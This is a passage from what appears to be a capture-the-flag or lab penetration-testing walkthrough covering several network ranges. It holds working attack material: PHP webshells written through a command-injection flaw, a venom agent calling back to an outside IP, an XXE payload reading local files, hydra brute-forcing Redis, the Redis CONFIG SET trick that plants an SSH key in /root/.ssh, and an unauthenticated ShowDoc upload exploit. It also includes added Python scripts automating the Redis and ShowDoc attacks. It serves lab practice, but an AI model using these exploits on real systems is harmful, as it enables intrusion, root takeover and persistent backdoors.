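    for host, n in sorted(hits.items(), key=lambda kv: ipaddress.ip_address(kv[0])):
        print(f"{host:15} body {n} bytes")
```

The sweep is sequential, so with the 5 s timeout a mostly-empty /24 takes a while; a host whose page happens to be exactly as long as the error page would be missed, which is why hits are worth eyeballing in the browser afterwards, as the writeup does.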

image-20250220100059621

192.168.0.10 already carries a webshell, shell.php.

image-20250220100206775

One flag is in the web directory and one in the root directory.

image-20250220100526916

Scenario 4

Download venom onto the host.

image-20250220101159210

Make it executable: chmod 777 agent_linux_x64 (chmod +x is enough; the binary does not need to be world-writable).

Set up venom:

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

Visit 192.168.0.138 through the proxy.

image-20250220103737590

Scenarios 7 & 8

Visit 192.168.0.250.

The captured login request has an XML body, so XXE is worth trying:

image-20250220104118522

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY Tsuki SYSTEM "file:///flag">
]>

<user><username>&Tsuki;</username><password>admin</password></user>

image-20250220104202261

The entity expands into the username field of the response: one flag in the web directory, one in the root directory.

Scenarios 5 & 6

image-20250220104521715

Write a script to probe the 10.10.0.0/24 segment from the foothold:

import requests

# probe 10.10.0.1-254 over HTTP and print hosts that answer 200
for i in range(1, 256):
    url = "http://10.10.0." + str(i)
    try:
        r = requests.get(url, timeout=3)   # without a timeout a filtered host stalls the loop
    except requests.RequestException:
        continue
    if r.status_code == 200:               # a 302/403 is a live host too; print r.status_code to see them
        print(url)

image-20250220105848765

Another host, 10.10.0.22, runs a CMS.

image-20250220105112984

Weak credentials get into the admin backend.

image-20250220105347643

Upload a webshell directly through the backend.

image-20250220105529294

One flag in the root directory and one in the web directory.

image-20250220105706879

image-20250220105746625

Penetration Test 4

Target: http://139.196.35.56:80

image-20250221101810494

Scenario 1

Brute force gets nowhere; tampering with the action parameter shows it is passed to code execution (RCE).

image-20250221101943200

Write a webshell through it (the trailing phpinfo makes the result visible):

system('echo "<?php phpinfo();eval(\$_POST[1]); ?>" > 1.php') | phpinfo

image-20250221102100610

Connect with AntSword.

image-20250221102231311

Scenario 2

Check the address: ifconfig is not available, so cat /etc/hosts instead.

image-20250221102519400

Run fscan; ICMP is not permitted from this shell, so use -np to skip the ping sweep.

image-20250221103043632

One web service, one SSH, one Redis.

A full-port scan additionally finds port 22000, which turns out to be the real SSH port.

image-20250221103354626

Set up the proxy:

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

Start with Redis, brute-forcing its AUTH password with hydra (-e ns also tries the empty password and the login as password; -f stops at the first hit):

proxychains hydra -P passwd-top22000.txt -e ns -f -V redis://192.168.0.202

The password is 123456.

image-20250221104203735

Write an SSH public key through Redis. This works because Redis runs as root (it can write /root/.ssh) and SAVE writes the RDB dump wherever dir/dbfilename point; the dump overwrites any existing authorized_keys.

ssh-keygen -t rsa   # generates the key pair under ~/.ssh by default

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt   # pad the public key with blank lines so sshd can parse it amid the RDB binary

cat /root/.ssh/1.txt | proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456 -x set crack   # store the padded key as the value of "crack"

proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456

config set dir /root/.ssh               # directory the RDB dump is written to
config set dbfilename authorized_keys   # dump file name
get crack                               # confirm the value is there
save                                    # write the dump to /root/.ssh/authorized_keys on the target
exit

image-20250221110708904

Then SSH in with the private key on the 22000 port found earlier:

proxychains ssh -i id_rsa -p 22000 root@192.168.0.202
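As an added example (not from the writeup), the redis-cli session above expressed as raw RESP commands over a plain socket: it needs no Redis client library, and because it is an ordinary TCP client it runs under proxychains like redis-cli did. Host, port and password are the writeup's; the public key is a placeholder, not a real key; the restore step and the CONFIG GET advice are mine.

```python
import socket

# Added example: write an SSH key via Redis CONFIG SET dir/dbfilename + SAVE, speaking
# RESP directly. Target details from the writeup; PUBKEY is a placeholder.
REDIS_HOST, REDIS_PORT, REDIS_PASS = "192.168.0.202", 6379, "123456"
PUBKEY = "ssh-rsa AAAAB3NzaC1yc2E...placeholder... attacker@vps"


def resp_command(*args) -> bytes:
    """Encode a command as a RESP array of bulk strings, exactly what redis-cli sends."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def authorized_keys_payload(pubkey: str) -> bytes:
    """Pad the key with blank lines. SAVE produces an RDB file, so the value sits between
    binary framing; sshd skips lines it cannot parse, but the key must start on its own line."""
    return b"\n\n" + pubkey.strip().encode() + b"\n\n"


def key_write_sequence(pubkey: str, password: str = "", target_dir: str = "/root/.ssh",
                       filename: str = "authorized_keys", keyname: str = "crack") -> list:
    """Ordered commands reproducing the manual session: AUTH, point the dump at
    /root/.ssh/authorized_keys, store the padded key, SAVE."""
    cmds = [resp_command("AUTH", password)] if password else []
    cmds += [
        resp_command("CONFIG", "SET", "dir", target_dir),
        resp_command("CONFIG", "SET", "dbfilename", filename),
        resp_command("SET", keyname, authorized_keys_payload(pubkey)),
        resp_command("SAVE"),
    ]
    return cmds


def restore_sequence(orig_dir: str, orig_file: str) -> list:
    """Put dir/dbfilename back so the service keeps dumping where it used to.
    Read the originals first with CONFIG GET dir / CONFIG GET dbfilename."""
    return [resp_command("CONFIG", "SET", "dir", orig_dir),
            resp_command("CONFIG", "SET", "dbfilename", orig_file)]


def send_all(host: str, port: int, cmds: list, timeout: float = 5.0) -> list:
    """Send each command and collect its reply; every step here should answer +OK.
    A -ERR on CONFIG SET dir means the Redis user cannot chdir into the target directory."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for cmd in cmds:
            s.sendall(cmd)
            replies.append(s.recv(4096))
    return replies


if __name__ == "__main__":
    for reply in send_all(REDIS_HOST, REDIS_PORT, key_write_sequence(PUBKEY, REDIS_PASS)):
        print(reply.decode(errors="replace").strip())
```

The same primitive with dir /var/spool/cron/ and a crontab-shaped value gives command execution instead of a key, which is what fscan's "writable path" lines later in this range are pointing at.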

image-20250221110816942

image-20250221111012849

Scenario 3

image-20250221111314222

The .100 host also exposes port 22000.

SSH in: ssh root@192.168.0.100 -p 22000

image-20250221111627916

Scenario 4

Check /etc/hosts for the next segment.

image-20250221111746923

Fetch fscan and venom with wget and scan:

./fscan -h 172.16.0.233/24

[+] target 172.16.0.233 alive (ICMP)
[+] target 172.16.0.1 alive (ICMP)
[+] target 172.16.0.153 alive (ICMP)
[+] ICMP-alive hosts: 3
[*] parsed 218 valid ports
[+] Port open 172.16.0.233:6379
[+] Port open 172.16.0.153:80
[+] Port open 172.16.0.1:22
[+] open ports: 3
[*] starting vulnerability scan...
[+] Redis scan module starting...
[*] Site title http://172.16.0.153 status: 302 length: 0 title: untitled redirect: http://172.16.0.153/web/#/
[*] Site title http://172.16.0.153/web/#/ status: 200 length: 1739 title: ShowDoc
[+] Redis 172.16.0.233:6379 123456 file:/root/.ssh/authorized_keys
[!] scan error 172.16.0.1:22 - total scan time exceeded: context deadline exceeded
[+] Redis 172.16.0.233:6379 writable path /root/.ssh/
[+] Redis 172.16.0.233:6379 writable path /var/spool/cron/

The Redis at 172.16.0.233 (password 123456, an authorized_keys already present) is evidently the instance from Scenario 2 seen on its other interface; the new target is the ShowDoc web service on 172.16.0.153, so add a second-hop proxy.

image-20250221112647057

ShowDoc has a known N-day: unauthenticated file upload through /index.php?s=/home/page/uploadImg, with the extension check bypassed by the filename test.<>php:

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 172.16.0.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo '123_test';@eval($_POST[cmd])?>
----------------------------921378126371623762173617--
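As an added example (not from the writeup), the request above built as raw bytes with a Content-Length computed from the actual body (the captured 265 is whatever the tool sent that day; edit the shell and it is wrong, and a wrong length makes the server wait or truncate the file) and sent over a plain socket, so proxychains can carry it through the venom hop. Host, path, field, filename, boundary and shell body are the writeup's; the `content_length_matches` check is mine.

```python
import socket

# Added example: raw multipart upload for the ShowDoc uploadImg request.
# All target-specific values are taken from the captured request in the writeup.
TARGET_HOST, TARGET_PORT = "172.16.0.153", 80
UPLOAD_PATH = "/index.php?s=/home/page/uploadImg"
BOUNDARY = "--------------------------921378126371623762173617"


def build_multipart_upload(host: str, path: str, field: str, filename: str, content: bytes,
                           boundary: str = BOUNDARY, content_type: str = "text/plain") -> bytes:
    """Single-file multipart/form-data POST. Lines are CRLF-terminated and Content-Length
    counts body bytes only, from the first boundary through the final CRLF."""
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return headers + body


def content_length_matches(request: bytes) -> bool:
    """Check a raw request's Content-Length against the bytes after the header block."""
    head, _, body = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip()) == len(body)
    return False


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Send the request and read until the server closes (Connection: close)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    shell = b"<?php echo '123_test';@eval($_POST[cmd])?>"
    req = build_multipart_upload(TARGET_HOST, UPLOAD_PATH, "editormd-image-file", "test.<>php", shell)
    assert content_length_matches(req)
    print(send_raw(TARGET_HOST, TARGET_PORT, req).decode(errors="replace"))
```

The response body carries the path the file was stored under; fetching it and seeing 123_test confirms the upload executed, after which AntSword connects with the cmd parameter.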


image-20250221113846179

Connect with AntSword and take the flag.

image-20250221114004317

Scenario 5

Download showdoc.db.php from the Sqlite directory: ShowDoc keeps its whole database in this one SQLite file, and the .php extension only makes a direct web request execute it as empty PHP instead of serving it; fetched through the shell it is the database.

image-20250221114308305

It contains usernames and password hashes, but the hash does not crack.

image-20250221114727164

Instead, log in by reusing one of the login tokens stored in the database (the user_token values), which authenticates without the password.

image-20250221115455324

root:Test@1234

image-20250221115439673

Full-port scan 172.16.0.153 for the non-standard SSH port.

image-20250221115734696

Then SSH in with the recovered credentials: proxychains ssh root@172.16.0.153 -p 22000

image-20250221123634896

The last flag is there.

That completes all four ranges.